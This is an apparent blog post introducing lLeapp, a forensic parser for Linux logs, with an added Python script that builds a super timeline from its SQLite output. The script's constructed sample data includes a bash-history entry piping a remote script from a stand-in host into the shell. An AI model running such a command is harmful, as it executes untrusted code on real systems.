Meet The Newest Member of the xLeapp Family
The newest member of the xLeapp family is lLeapp, which stands for Linux Logs Events Application Program Parser. Like all the other xLeapp programs, it processes artifacts and reports on them: it takes a zip, gzip or tgz archive or an extracted file system as input and produces an HTML report as output.
The initial version parses 37 artifacts, and some of them produce more than one report. A partial list of the parsed artifacts is below.
In the initial version you can run the program under Python 3.9 or download the Windows executables from the Releases section. The program comes in two (2) flavors, a GUI program and a CLI program. The GUI program's main screen looks like this.
The only inputs you need to provide are a file or folder to process and an output directory. Select the artifacts you want to parse, then process them. Once processing completes, you can open the HTML report of the parsed artifacts.
Along with the HTML report there are TSV files for each report; they can be found in the “_TSV Export” directory. The temp directory holds all the artifact files that were copied from the data source and processed. The _Timeline directory contains a SQLite database of timeline data from which you can build a super timeline.
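As an added example of what you can do with the _Timeline database (this is not lLeapp's own code), the script below reads the timeline table, orders the events, and writes them out as a single CSV super timeline. It assumes the database has one table `data(key TEXT, activity TEXT, datalist TEXT)`, the layout the sibling xLEAPP tools use for their tl.db, with the event timestamp in `key`, the artifact name in `activity`, and a stringified Python list of "HEADER: value" strings in `datalist`; confirm that against your own output before relying on it. The sample rows are constructed for illustration, not taken from a real lLeapp run.

```python
"""Build a sorted super timeline from an xLEAPP-style timeline database.

Added example, not part of lLeapp. Assumption: the _Timeline database holds a
single table data(key, activity, datalist) in the layout used by the other
xLEAPP tools' tl.db. Verify the schema with `sqlite3 tl.db .schema` first.
"""
import ast
import csv
import io
import sqlite3

# Constructed sample rows in the assumed tl.db layout (not real lLeapp output):
# key = event timestamp, activity = artifact name, datalist = str() of a list of
# "HEADER: value" strings. The headers shown are hypothetical.
SAMPLE_ROWS = [
    ("2021-03-02 10:15:42", "AUTH LOG",
     "['TIMESTAMP: 2021-03-02 10:15:42', 'HOST: srv01', "
     "'MESSAGE: Accepted publickey for root from 10.0.0.5 port 51222 ssh2']"),
    ("2021-03-02 10:14:03", "BASH HISTORY",
     "['TIMESTAMP: 2021-03-02 10:14:03', 'USER: root', "
     "'COMMAND: curl http://example.invalid/x.sh | sh']"),
    ("2021-03-02 10:16:10", "CRON",
     "['TIMESTAMP: 2021-03-02 10:16:10', 'USER: root', 'COMMAND: /tmp/.x']"),
]


def build_sample_db():
    """Create an in-memory database in the assumed tl.db layout."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE data(key TEXT, activity TEXT, datalist TEXT)")
    db.executemany("INSERT INTO data VALUES(?,?,?)", SAMPLE_ROWS)
    db.commit()
    return db


def parse_datalist(text):
    """Turn the stringified list back into a {HEADER: value} dict.

    literal_eval only accepts Python literals, so a malformed or hostile
    datalist cannot execute code; anything unparsable is kept verbatim.
    """
    try:
        items = ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return {"RAW": text}
    fields = {}
    for item in items:
        name, _, value = str(item).partition(": ")
        fields[name] = value
    return fields


def super_timeline(db):
    """Return every timeline row as a dict, ordered by timestamp key."""
    rows = db.execute(
        "SELECT key, activity, datalist FROM data ORDER BY key"
    ).fetchall()
    return [
        {"timestamp": key, "source": activity, "fields": parse_datalist(datalist)}
        for key, activity, datalist in rows
    ]


def to_csv(events):
    """Flatten the events into one CSV text block for a timeline viewer."""
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["timestamp", "source", "detail"])
    for event in events:
        detail = "; ".join(
            f"{name}={value}"
            for name, value in event["fields"].items()
            if name != "TIMESTAMP"
        )
        writer.writerow([event["timestamp"], event["source"], detail])
    return out.getvalue()


if __name__ == "__main__":
    # To use a real lLeapp output, replace build_sample_db() with
    # sqlite3.connect("<output dir>/_Timeline/tl.db").
    print(to_csv(super_timeline(build_sample_db())))
```

Ordering by the `key` column only gives a correct chronology when every artifact writes its timestamp in the same sortable form (ISO-style, UTC); if a parser emits a different format, normalize the key before sorting. Keep the exported CSV alongside the original tl.db so the derived timeline can be checked back against its source.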
In the coming weeks I plan to add more artifacts and to create a plugin for Autopsy so that Autopsy can process more Linux data. If anyone has artifacts they would like to see added, please let me know. As always, comments are welcome.